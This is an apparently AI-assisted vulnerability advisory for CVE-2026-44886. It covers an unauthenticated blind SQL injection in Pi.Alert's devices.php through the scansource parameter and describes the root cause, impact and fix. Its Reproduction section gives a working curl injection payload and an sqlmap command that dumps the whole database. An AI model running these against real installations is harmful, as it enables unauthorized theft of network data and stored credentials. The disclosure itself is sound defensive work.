VYPR
← All advisories
High severityNVD Advisory· Published May 27, 2026

CVE-2026-44886

CVE-2026-44886

Description

Pi.Alert is a WIFI / LAN intruder detector with web service monitoring. From 2024-06-29 to before 2026-05-07, the web application endpoint is vulnerable to SQL injection. The /pialert/php/server/devices.php route accepts requests from unauthenticated users when the action URL parameter is set to getDevicesTotals. The scansource URL parameter is then injected in a SQL query. This vulnerability is fixed in 2026-05-07.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Pi.Alert versions before 2026-05-07 allow unauthenticated blind SQL injection via the `scansource` parameter in `devices.php`, enabling full database extraction.

Vulnerability

In Pi.Alert, a LAN intruder detector with web monitoring, the /pialert/php/server/devices.php endpoint is vulnerable to SQL injection in versions from 2024-06-29 up to but not including the fix released on 2026-05-07. When the action parameter is set to getDevicesTotals, the authentication check is bypassed. The scansource URL parameter is then directly concatenated into SQL queries without sanitization, allowing injection of arbitrary SQLite commands [1].

Exploitation

An attacker does not need any authentication or special privileges; the vulnerable code path is reachable without a valid session. By sending a crafted HTTP request to /pialert/php/server/devices.php?action=getDevicesTotals&scansource=, the attacker can inject malicious SQL code. The injection is blind but can be exploited using boolean-based or time-based techniques to extract data from the database [1].

Impact

Successful exploitation allows an unauthenticated attacker to dump all data present in the SQLite database. This includes potentially sensitive information such as device details, network events, and any stored credentials or configuration secrets. The CIA impact is primarily confidentiality and integrity breach, as the attacker can read and possibly modify database content [1].

Mitigation

The vulnerability is fixed in the version released on 2026-05-07. Users should update Pi.Alert to the latest available version [1]. For installations that cannot immediately update, no workaround is explicitly provided in the available references; however, restricting network access to the web interface or placing it behind a VPN may reduce exposure. The vulnerability is not listed on CISA's Known Exploited Vulnerabilities (KEV) catalog as of writing.

References
  1. Web Interface Vulnerable to Unauthenticated Blind SQL Injection

AI Insight generated on May 27, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected products

2
  • Leiweibau/Pi.alertinferred2 versions
    >=2024-06-29,<2026-05-07+ 1 more
    • (no CPE)range: >=2024-06-29,<2026-05-07
    • (no CPE)range: < 2026-05-07

Patches

0

No patches discovered yet.

Vulnerability mechanics

Root cause

"The `scansource` URL parameter is concatenated directly into a SQL query without sanitization or parameterization, and the `action=getDevicesTotals` path bypasses authentication checks."

Attack vector

An unauthenticated attacker sends a GET request to `/pialert/php/server/devices.php` with `action=getDevicesTotals` and a malicious `scansource` parameter [ref_id=1]. The `action=getDevicesTotals` value bypasses the authentication check, so even when password authentication is enabled, no login is required [ref_id=1]. The `scansource` value is injected into a SQL query via string concatenation in `getDeviceCondition()`, allowing the attacker to manipulate the query and exfiltrate database contents [ref_id=1].

Affected code

The vulnerable endpoint is `/pialert/php/server/devices.php`. When `action=getDevicesTotals` is set, the `scansource` URL parameter is passed unsanitized into the `getDeviceCondition()` function, which concatenates it directly into a SQL query string [ref_id=1]. The `getDevicesTotals()` function and `getDeviceCondition()` function are both in the same file [ref_id=1].

What the fix does

The advisory recommends two fixes: use parameterized queries to prevent SQL injection, and enforce authentication for the `getDevicesTotals` action when password authentication is enabled [ref_id=1]. The fix was released on 2026-05-07. No patch diff is included in the bundle, but the advisory's guidance directly addresses both the injection vector (unsanitized concatenation) and the authentication bypass (missing access control on the action).

Preconditions

  • networkAttacker must be able to send HTTP requests to the Pi.Alert web application
  • authNo authentication required — the action=getDevicesTotals parameter bypasses the login check even when password auth is enabled

Reproduction

Step 1: Send a test request to confirm the vulnerability: ``` curl \ --get \ --data 'action=getDevicesTotals' \ --data-urlencode 'scansource=local" OR "1"="1' \ 'http://<host>/pialert/php/server/devices.php' ``` An array of identical non-zero numbers (e.g., `[9,9,9,9,9,9,9]`) indicates the server is vulnerable [ref_id=1].

Step 2: Use sqlmap to dump the database: ``` sqlmap \ -u 'http://<host>/pialert/php/server/devices.php?action=getDevicesTotals&scansource=local' \ -p scansource \ --batch \ --level=2 \ --dump-all ``` [ref_id=1]

Generated on May 27, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References

1

News mentions

0

No linked articles in our index yet.